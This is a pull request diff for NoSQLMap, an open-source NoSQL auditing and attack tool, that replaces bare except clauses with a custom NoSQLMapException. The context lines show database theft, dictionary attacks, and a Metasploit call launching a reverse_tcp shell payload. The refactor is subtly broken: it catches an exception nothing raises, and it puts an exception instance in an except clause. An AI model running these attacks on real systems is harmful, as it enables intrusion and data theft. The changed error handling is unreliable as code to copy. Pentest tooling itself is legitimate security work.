Merge pull request #99 from bbeale/master

Added base exception class NoSQLMapException inside exception.py.

Author: codingo

exception.py

@@ -0,0 +1,6 @@
+#!/usr/bin/python
+# NoSQLMap Copyright 2012-2017 NoSQLMap Development team
+# See the file 'doc/COPYING' for copying permission
+
+class NoSQLMapException(Exception):
+    pass

nosqlmap.py

@@ -3,6 +3,7 @@
 # NoSQLMap Copyright 2012-2017 NoSQLMap Development team
 # See the file 'doc/COPYING' for copying permission
 
+from exception import NoSQLMapException
 import sys
 import nsmcouch
 import nsmmongo
@@ -279,7 +280,7 @@ def options():
                                 print "Bad octet in IP address."
                                 goodDigits = False
 
-                        except:
+                        except NoSQLMapException("[!] Must be a DNS name."):
                             #Must be a DNS name (for now)
 
                             notDNS = False

nsmcouch.py

@@ -2,6 +2,7 @@
 # NoSQLMap Copyright 2012-2017 NoSQLMap Development team
 # See the file 'doc/COPYING' for copying permission
 
+from exception import NoSQLMapException
 import couchdb
 import urllib
 import requests
@@ -39,10 +40,10 @@ def couchScan(target,port,pingIt):
                 except couchdb.http.Unauthorized:
                     return [1,None]
 
-                except:
+                except NoSQLMapException:
                     return [2,None]
 
-            except:
+            except NoSQLMapException:
                 return [3,None]
 
         else:
@@ -59,10 +60,10 @@ def couchScan(target,port,pingIt):
             except couchdb.http.Unauthorized:
                 return [1,None]
 
-            except:
+            except NoSQLMapException:
                 return [2,None]
 
-        except:
+        except NoSQLMapException:
             return [3,None]
 
 def netAttacks(target,port, myIP, args = None):
@@ -92,7 +93,7 @@ def netAttacks(target,port, myIP, args = None):
                 print "CouchDB authenticated on " + target + ":" + str(port)
                 mgtOpen = True
 
-            except:
+            except NoSQLMapException:
                 raw_input("Failed to authenticate.  Press enter to continue...")
                 return
 
@@ -113,7 +114,7 @@ def netAttacks(target,port, myIP, args = None):
         if mgtRespCode == 200:
             print "Sofa web management open at " + mgtUrl + ".  No authentication required!"
 
-    except:
+    except NoSQLMapException:
         print "Sofa web management closed or requires authentication."
 
     if mgtOpen == True:
@@ -152,7 +153,7 @@ def getPlatInfo(couchConn, target):
     return
 
 
-def enumAtt(conn,target):
+def enumAtt(conn, target, port):
     dbList = []
     print "Enumerating all attachments..."
 
@@ -179,7 +180,7 @@ def enumDbs (couchConn,target,port):
             print "\n".join(dbList)
             print "\n"
 
-    except:
+    except NoSQLMapException:
             print "Error:  Couldn't list databases.  The provided credentials may not have rights."
 
     if '_users' in dbList:
@@ -253,7 +254,7 @@ def stealDBs (myDB,couchConn,target,port):
         else:
             return
 
-    except:
+    except NoSQLMapException:
         raw_input ("Something went wrong.  Are you sure your CouchDB is running and options are set? Press enter to return...")
         return
 
@@ -343,7 +344,7 @@ def dict_pass(key,salt,dbVer):
                 passList = f.readlines()
                 loadCheck = True
 
-        except:
+        except NoSQLMapException:
             print " Couldn't load file."
 
     print "Running dictionary attack..."

nsmmongo.py

@@ -2,6 +2,7 @@
 # NoSQLMap Copyright 2012-2017 NoSQLMap Development team
 # See the file 'doc/COPYING' for copying permission
 
+from exception import NoSQLMapException
 import pymongo
 import urllib
 import json
@@ -49,7 +50,7 @@ def netAttacks(target, dbPort, myIP, myPort, args = None):
             conn = pymongo.MongoClient(target)
             print "MongoDB authenticated on " + target + ":27017!"
             mgtOpen = True
-        except:
+        except NoSQLMapException:
             raw_input("Failed to authenticate.  Press enter to continue...")
             return
 
@@ -91,7 +92,7 @@ def netAttacks(target, dbPort, myIP, myPort, args = None):
                 print "REST interface not enabled."
             print "\n"
 
-    except Exception, e:
+    except NoSQLMapException:
         print "MongoDB web management closed or requires authentication."
 
     if mgtOpen == True:
@@ -180,7 +181,7 @@ def stealDBs(myDB,victim,mongoConn):
         else:
             return
 
-    except Exception, e:
+    except NoSQLMapException, e:
         if str(e).find('text search not enabled') != -1:
             raw_input("Database copied, but text indexing was not enabled on the target.  Indexes not moved.  Press enter to return...")
             return
@@ -231,7 +232,7 @@ def dict_pass(user,key):
             with open (dictionary) as f:
                    passList = f.readlines()
             loadCheck = True
-        except:
+        except NoSQLMapException:
             print " Couldn't load file."
 
     print "Running dictionary attack..."
@@ -303,7 +304,7 @@ def enumDbs (mongoConn):
         print "\n".join(mongoConn.database_names())
         print "\n"
 
-    except:
+    except NoSQLMapException:
         print "Error:  Couldn't list databases.  The provided credentials may not have rights."
 
     print "List of collections:"
@@ -328,19 +329,19 @@ def enumDbs (mongoConn):
                     if crack in yes_tag:
                         passCrack(users[x]['user'],users[x]['pwd'])
 
-    except Exception, e:
+    except NoSQLMapException, e:
         print e
         print "Error:  Couldn't list collections.  The provided credentials may not have rights."
 
     print "\n"
     return
 
 
-def msfLaunch():
+def msfLaunch(victim, myIP, myPort):
     try:
         proc = subprocess.call(["msfcli", "exploit/linux/misc/mongod_native_helper", "RHOST=%s" % victim, "DB=local", "PAYLOAD=linux/x86/shell/reverse_tcp", "LHOST=%s" % myIP, "LPORT=%s" % myPort, "E"])
 
-    except:
+    except NoSQLMapException:
         print "Something went wrong.  Make sure Metasploit is installed and path is set, and all options are defined."
     raw_input("Press enter to continue...")
     return
@@ -357,10 +358,10 @@ def enumGrid (mongoConn):
                 print " list of files:"
                 print "\n".join(files)
 
-            except:
+            except NoSQLMapException:
                 print "GridFS not enabled on " + str(dbItem) + "."
 
-    except:
+    except NoSQLMapException:
         print "Error:  Couldn't enumerate GridFS.  The provided credentials may not have rights."
 
     return
@@ -381,7 +382,7 @@ def mongoScan(ip,port,pingIt):
                     conn.close()
                     return [0,dbVer]
 
-                except:
+                except NoSQLMapException:
                     if str(sys.exc_info()).find('need to login') != -1:
                         conn.close()
                         return [1,None]
@@ -390,7 +391,7 @@ def mongoScan(ip,port,pingIt):
                         conn.close()
                         return [2,None]
 
-            except:
+            except NoSQLMapException:
                 return [3,None]
 
         else:
@@ -405,7 +406,7 @@ def mongoScan(ip,port,pingIt):
                 conn.close()
                 return [0,dbVer]
 
-            except Exception, e:
+            except NoSQLMapException, e:
                 if str(e).find('need to login') != -1:
                     conn.close()
                     return [1,None]
@@ -414,5 +415,5 @@ def mongoScan(ip,port,pingIt):
                     conn.close()
                     return [2,None]
 
-        except:
+        except NoSQLMapException:
             return [3,None]

nsmscan.py

@@ -3,6 +3,7 @@
 # See the file 'doc/COPYING' for copying permission
 
 
+from exception import NoSQLMapException
 import ipcalc
 import nsmmongo
 import nsmcouch
@@ -41,7 +42,7 @@ def massScan(platform, args = None):
                 for ip in ipcalc.Network(subnet):
                     ipList.append(str(ip))
                 optCheck = False
-            except:
+            except NoSQLMapException:
                 raw_input("Not a valid subnet.  Press enter to return to main menu.")
                 return
 
@@ -54,7 +55,7 @@ def massScan(platform, args = None):
                             ipList = f.readlines()
                     loadCheck = True
                     optCheck = False
-                except:
+                except NoSQLMapException:
                     print "Couldn't open file."
 
         if loadOpt == "3":
@@ -119,7 +120,7 @@ def massScan(platform, args = None):
                 print "Scan results saved!"
                 select = False
 
-            except:
+            except NoSQLMapException:
                 print "Couldn't save scan results."
 
         elif saveEm in no_tag:

nsmweb.py

@@ -3,6 +3,7 @@
 # See the file 'doc/COPYING' for copying permission
 
 
+from exception import NoSQLMapException
 import urllib
 import urllib2
 import string
@@ -106,7 +107,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders, args = None):
 
         else:
             print "Got " + str(appRespCode) + "from the app, check your options."
-    except Exception,e:
+    except NoSQLMapException,e:
         print e
         print "Looks like the server didn't respond.  Check your options."
 
@@ -445,7 +446,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders, args = None)
         else:
             print "Got " + str(appRespCode) + "from the app, check your options."
 
-    except Exception,e:
+    except NoSQLMapException,e:
         print e
         print "Looks like the server didn't respond.  Check your options."
 
@@ -464,7 +465,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders, args = None)
                 injIndex = int(args.injectedParameter)
             injOpt = str(postData.keys()[int(injIndex)-1])
             print "Injecting the " + injOpt + " parameter..."
-        except:
+        except NoSQLMapException:
             if args == None:
                 raw_input("Something went wrong.  Press enter to return to the main menu...")
             return
@@ -909,7 +910,7 @@ def buildUri(origUri, randValue, args=None):
         split_uri = origUri.split("?")
         params = split_uri[1].split("&")
 
-    except:
+    except NoSQLMapException:
         raw_input("Not able to parse the URL and parameters.  Check options settings.  Press enter to return to main menu...")
         return
 
@@ -938,7 +939,7 @@ def buildUri(origUri, randValue, args=None):
         for params in injOpt:
             print "Injecting the " + params + " parameter..."
 
-    except Exception:
+    except NoSQLMapException:
         raw_input("Something went wrong.  Press enter to return to the main menu...")
         return